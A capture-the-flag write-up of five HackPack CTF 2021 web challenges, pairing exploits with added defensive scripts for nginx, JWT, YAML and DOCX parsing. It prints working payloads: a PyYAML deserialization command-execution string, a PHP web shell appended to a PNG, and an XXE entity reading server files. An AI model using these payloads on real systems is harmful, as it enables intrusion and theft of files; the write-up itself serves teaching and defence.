All web challenges from HackPack CTF 2021.
"N"ot "G"am"I"ng a"N"ymore in "X"mas
Can you login as admin?
http://no-gaming-anymore-in-xmas.ctf2021.hackpack.club
```html
...
<span>Admin Login</span>
<div>
<input placeholder="Password"></input>
</div>
<form action="/" method="post">
<button type="submit" value="Send Email" >Login</button>
<input type="hidden" name="debug" value="0">
</form>
...
```
The form carries a hidden debug field. Make a POST request with debug=1 and we get some interesting feedback:
```nginx
Let me check again my nginx conf:
server {
listen 80;
server_name localhost;
root /etc/nginx;
index index.html;
location /maybehereimportantstuff {
try_files $uri $uri/ =404;
}
}
```
The document root is /etc/nginx, so the /maybehereimportantstuff location is served straight out of the nginx configuration directory. Execute
curl https://no-gaming-anymore-in-xmas.ctf2021.hackpack.club/maybehereimportantstuff
and get the flag.
Flag: flag{ng1nx_m1sconf1g_c4n_b3_h4rmful}
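The misconfiguration here is a `root` that points into a directory nginx was never meant to serve. As an added example (not part of the writeup or the challenge), the script below is a small regex-based audit that flags `root`/`alias` directives inside or above sensitive directories, reports which `location` prefixes then resolve to a filesystem path under that root, and flags `autoindex on`. The leaked configuration is reproduced as constructed sample input; the list of sensitive directories and the fixed `/var/www/html` root are my assumptions, not anything the page states.

```python
import re

# Constructed sample input: a copy of the configuration the debug=1 response
# leaked (the listing quoted above), minus the "Let me check" prose line.
LEAKED_CONF = """\
server {
    listen 80;
    server_name localhost;
    root /etc/nginx;
    index index.html;
    location /maybehereimportantstuff {
        try_files $uri $uri/ =404;
    }
}
"""

# The same server block with a purpose-built document root (assumed fix).
FIXED_CONF = LEAKED_CONF.replace("root /etc/nginx;", "root /var/www/html;")

# Directories whose contents must never be reachable through a document root
# (assumed list; extend for your environment).
SENSITIVE = ("/etc", "/root", "/home", "/proc", "/sys", "/dev", "/boot",
             "/var/log", "/var/lib", "/usr/lib")

DIRECTIVE = re.compile(r"^\s*(root|alias|autoindex)\s+([^;]+);")
LOCATION = re.compile(r"^\s*location\s+(?:([=~*^]+)\s+)?(\S+)\s*\{")


def is_sensitive_root(path):
    """True when `path` is a sensitive directory, lies inside one, or contains one
    (root / contains everything; root /etc/nginx lies inside /etc)."""
    r = path.rstrip("/") or "/"
    if r == "/":
        return True
    return any(r == s or r.startswith(s + "/") or s.startswith(r + "/")
               for s in SENSITIVE)


def audit_nginx(conf):
    """Scan an nginx config for document roots that expose sensitive directories
    and for directory listings. Returns a list of (line_number, message).
    Regex-based: adequate for server/location blocks like the one above,
    not a full nginx configuration parser."""
    findings = []
    current_root = None
    for lineno, line in enumerate(conf.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if m:
            name, value = m.group(1), m.group(2).strip()
            if name == "root":
                current_root = value
            if name in ("root", "alias") and is_sensitive_root(value):
                findings.append((lineno, f"{name} {value}: serves files out of a sensitive directory"))
            elif name == "autoindex" and value == "on":
                findings.append((lineno, "autoindex on: directory listing exposes every file under the root"))
            continue
        m = LOCATION.match(line)
        if m and current_root and is_sensitive_root(current_root):
            modifier, prefix = m.group(1), m.group(2)
            if modifier and "~" in modifier:
                continue  # regex locations do not map to one filesystem path
            fs_path = current_root.rstrip("/") + prefix
            findings.append((lineno, f"location {prefix} resolves to {fs_path}"))
    return findings


if __name__ == "__main__":
    for lineno, msg in audit_nginx(LEAKED_CONF):
        print(f"line {lineno}: {msg}")
    print("fixed config findings:", audit_nginx(FIXED_CONF))
```

Run against the leaked config it reports the `root /etc/nginx;` line and that `/maybehereimportantstuff` resolves to `/etc/nginx/maybehereimportantstuff`, which is exactly the path the `curl` above fetched; the same block with `root /var/www/html;` produces no findings.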
All about resetting
Who can guess my password or..
http://all-about-resetting.ctf2021.hackpack.club
```html
<!-- Maintaned by Nikos (npantel@ncsu.edu) -->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V1</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<!-- Maintaned by Nikos (npantel@ncsu.edu) -->
<body>
<span class="login100-form-title">
Member Login
</span>
<div>
<input placeholder="Email">
</input>
</div>
<div>
<input placeholder="Password">
</input>
</div>
<div class="container-login100-form-btn">
<button class="login100-form-btn">
Login
</button>
</div>
<form action="/reset" method="post">
<button type="submit" value="Send Email" >Forgot Password?</button>
</form>
</body>
</html>
```
Press Forgot Password?, enter the email npantel@ncsu.edu from the HTML comment and submit. We get a security question: What is your favorite type of governance?
Delete the session cookie, refresh to get a fresh one, and paste the new cookie into jwt.io. The decoded payload is
```json
{
"favoritegovernance": "kakistocracy",
"favoriteteam": "olympiacos"
}
```
Type in kakistocracy as the answer and log in to get the flag.
Flag: flag{Wh4t_1s_th1s_gov3rn4nc3_!!!}
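The bug is that the reset answer is stored as a claim in the session JWT. A JWT is signed, not encrypted, so anyone holding the cookie can read its claims without the key; jwt.io just does the base64url decoding for you. As an added example (not the challenge's code), the block below does the same decoding in plain Python, and mints a comparable token with a constructed secret so the demo runs offline; the page does not show the real token, secret or signing algorithm, so the HS256 header and the secret string are assumptions. Only the two claims are taken from the writeup.

```python
import base64
import hashlib
import hmac
import json


def _b64url_decode(s):
    # JWTs strip the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_jwt_unverified(token):
    """Return (header, payload) from a JWT without checking the signature.
    This is all an attacker needs: claims are only base64url-encoded JSON."""
    header_b64, payload_b64, _sig = token.split(".")
    return (json.loads(_b64url_decode(header_b64)),
            json.loads(_b64url_decode(payload_b64)))


def make_hs256_jwt(payload, secret):
    """Build a HS256-signed token. Used here only to construct a sample cookie;
    the challenge's real algorithm and secret are not on the page."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (_b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." +
                     _b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def verify_hs256(token, secret):
    """Signature check the server does; the attacker never needs to run it."""
    signing_input, sig_b64 = token.rsplit(".", 1)
    expected = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig_b64))


# Claims quoted from the writeup; the secret is a constructed placeholder.
SAMPLE_CLAIMS = {"favoritegovernance": "kakistocracy", "favoriteteam": "olympiacos"}
ASSUMED_SECRET = "server-side-secret-not-from-the-page"
SAMPLE_TOKEN = make_hs256_jwt(SAMPLE_CLAIMS, ASSUMED_SECRET)


def leaked_answer(token):
    """What the attacker extracts from the cookie: the reset answer itself."""
    _header, payload = decode_jwt_unverified(token)
    return payload.get("favoritegovernance")


if __name__ == "__main__":
    print(SAMPLE_TOKEN)
    print("answer readable without the key:", leaked_answer(SAMPLE_TOKEN))
    print("signature valid for server:", verify_hs256(SAMPLE_TOKEN, ASSUMED_SECRET))
```

The fix is not a stronger signature: the answer has to live server side (keyed by a random session id or reset token) and never be placed in a client-held token, signed or otherwise, unless the token is also encrypted.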
Yaml-2-Json
Checkout my useful tool to convert YAML to JSON format.
http://yaml-2-json.ctf2021.hackpack.club
From the hint we know the flag is at /tmp/flag.txt. A YAML-to-JSON converter is most likely built on PyYAML, and yaml.load with the unsafe Loader constructs arbitrary Python objects from !!python/ tags, so a deserialization RCE is worth trying. Make the request:
```http
POST / HTTP/1.1
Host: yaml-2-json.ctf2021.hackpack.club
Connection: close
Content-Length: 76
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://yaml-2-json.ctf2021.hackpack.club
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://yaml-2-json.ctf2021.hackpack.club/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _890f5=http://192.168.181.16:10993; premium=true

yaml=!!python/object/apply:subprocess.check_output [["cat","/tmp/flag.txt"]]
```
Flag: flag{Py_PyYaml_Yaml_Py}
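The payload works because `!!python/object/apply:` is a PyYAML-specific tag that tells the unsafe loader to call the named callable with the given arguments. As an added example (not the challenge's source, which is not on the page), the block below puts the converter the service evidently runs next to a hardened one: `yaml.safe_load` only builds scalars, lists and dicts and raises on the `python/` tags, and a pre-parse check on the tag namespace gives you something cheap to alert on. The payload is reproduced from the request above as sample input; the `yaml` import is done inside the functions so the tag check runs even where PyYAML is not installed.

```python
import json
import re

# The payload the writeup posted in the yaml= form field, reproduced as sample input.
RCE_PAYLOAD = '!!python/object/apply:subprocess.check_output [["cat","/tmp/flag.txt"]]'
BENIGN = "name: test\nitems:\n  - 1\n  - 2\n"

# "!!python/..." is shorthand for the tag:yaml.org,2002:python/... namespace;
# the verbatim form !<tag:yaml.org,2002:python/...> is the same tag, so a
# filter that only looks for "!!python" would miss it.
PYTHON_TAG = re.compile(r"!!python/|!<tag:yaml\.org,2002:python/")


def has_python_tags(text):
    """Cheap boundary check: does the document use PyYAML's python/ tags at all?"""
    return PYTHON_TAG.search(text) is not None


def yaml_to_json_unsafe(text):
    """What the service evidently does. yaml.Loader honours !!python/object/apply,
    so the document above runs subprocess.check_output on the server (RCE)."""
    import yaml
    return json.dumps(yaml.load(text, Loader=yaml.Loader))


def yaml_to_json_safe(text):
    """Hardened converter. safe_load's constructor has no python/ tags and raises
    ConstructorError on them; the tag check in front just turns that into an
    explicit rejection you can log."""
    import yaml
    if has_python_tags(text):
        raise ValueError("refusing input that uses python-specific YAML tags")
    try:
        data = yaml.safe_load(text)
    except yaml.YAMLError as exc:  # ConstructorError, ScannerError, ... all subclass this
        raise ValueError(f"invalid YAML: {exc}") from exc
    return json.dumps(data)


if __name__ == "__main__":
    print(yaml_to_json_safe(BENIGN))
    try:
        yaml_to_json_safe(RCE_PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

`yaml.load(text)` with no `Loader` argument was the unsafe default in PyYAML before 5.1, which is why so many converters of this vintage are exploitable with exactly this one-liner; `safe_load` has existed the whole time.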
Indead v1
Job posting website for security experts, pentesters and hackers.
http://indead-upload-avatar.ctf2021.hackpack.club
Take any PNG file, say test.png, and append a PHP web shell to a copy of it so the file still starts with the PNG magic bytes:
```sh
cp test.png exp.php
echo "<?php system(\$_GET['c']); ?>" >> exp.php
```
Upload exp.php. The upload is accepted and the file is stored under very_long_directory_path. From the hint we know flag.txt is in /var/www/, so requesting
https://indead-upload-avatar.ctf2021.hackpack.club/very_long_directory_path/exp.php?c=cat%20/var/www/flag.txt
gives us the flag.
Flag: flag{y3t_an0ther_file_uplo@d_vuln}
Indead v2
Job posting website for security experts, pentesters and hackers. Now you can apply by uploading CV.
http://indead-upload-cv.ctf2021.hackpack.club
For this challenge we can only upload DOCX files. Create test.docx with test1 as its content, upload it, and the page replies You CV content: test1. The server is parsing the XML inside the document, so there might be an XXE vulnerability.
Unzip test.docx and edit word/document.xml. Add on line 2, right after the XML declaration:
```xml
<!DOCTYPE test [<!ENTITY xxe SYSTEM 'file:///var/www/flag.txt'>]>
```
Edit line 3, replacing the text run
```xml
...<w:t>test1</w:t>...
```
with
```xml
...<w:t>&xxe;</w:t>...
```
Put all the extracted files in a folder tmp and rebuild the DOCX (a DOCX is just a ZIP archive with a fixed layout):
```sh
7z a malicious.zip ./tmp/*
mv malicious.zip malicious.docx
```
Upload malicious.docx and get the flag.
Flag: flag{XML_is_ancestor_0f_every7hing_do_you_agree_?}
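The attack only needs two things: a DOCTYPE that declares an external entity, and a text run that references it so the resolved file contents are echoed back in You CV content. OOXML parts never legitimately carry a DTD, so the cleanest defence is to reject any XML part containing one before it reaches a parser. As an added example (not the challenge's code), the block below builds a benign and a malicious CV in memory with `zipfile` (the writeup used 7z for the same thing), then shows a check that finds the DTD in the malicious one and an extractor that refuses to parse it. The minimal document.xml and [Content_Types].xml are constructed and far smaller than what Word emits; the DOCTYPE line is the one from the writeup.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

XML_DECL = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Constructed minimal package parts; a real docx has many more, but the
# challenge only reads word/document.xml.
CONTENT_TYPES = (XML_DECL +
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-'
    'officedocument.wordprocessingml.document.main+xml"/></Types>')


def document_xml(text_run, dtd=""):
    """word/document.xml with one text run; `dtd` is inserted on line 2,
    exactly where the writeup put the DOCTYPE."""
    return (XML_DECL + "\n" + dtd +
            f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r>'
            f'<w:t>{text_run}</w:t></w:r></w:p></w:body></w:document>')


def build_docx(doc_xml):
    """Zip the parts into a DOCX (what `7z a` + `mv` did above)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/document.xml", doc_xml)
    return buf.getvalue()


XXE_DTD = "<!DOCTYPE test [<!ENTITY xxe SYSTEM 'file:///var/www/flag.txt'>]>\n"
BENIGN_DOCX = build_docx(document_xml("test1"))
MALICIOUS_DOCX = build_docx(document_xml("&xxe;", XXE_DTD))

DTD_MARKER = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def find_dtd_parts(docx_bytes):
    """Names of XML parts that carry a DOCTYPE or ENTITY declaration.
    OOXML never needs a DTD, so any hit is grounds to reject the upload."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if name.lower().endswith((".xml", ".rels")) and DTD_MARKER.search(z.read(name)):
                hits.append(name)
    return hits


def extract_text(docx_bytes):
    """What the CV endpoint should do: refuse DTDs first, then read the <w:t> runs.
    Rejecting up front means the parser's entity handling never becomes the
    last line of defence."""
    bad = find_dtd_parts(docx_bytes)
    if bad:
        raise ValueError(f"DTD declaration in {bad}; refusing to parse")
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    return "".join(t.text or "" for t in root.iterfind(".//w:t", {"w": W_NS}))


if __name__ == "__main__":
    print("benign CV text:", extract_text(BENIGN_DOCX))
    print("malicious parts:", find_dtd_parts(MALICIOUS_DOCX))
    try:
        extract_text(MALICIOUS_DOCX)
    except ValueError as exc:
        print("rejected:", exc)
```

The same pre-check generalises to every ZIP-of-XML format (XLSX, PPTX, ODT, SVG inside archives): scan every XML-ish member for `<!DOCTYPE` / `<!ENTITY` and drop the file before any parser with entity expansion enabled sees it.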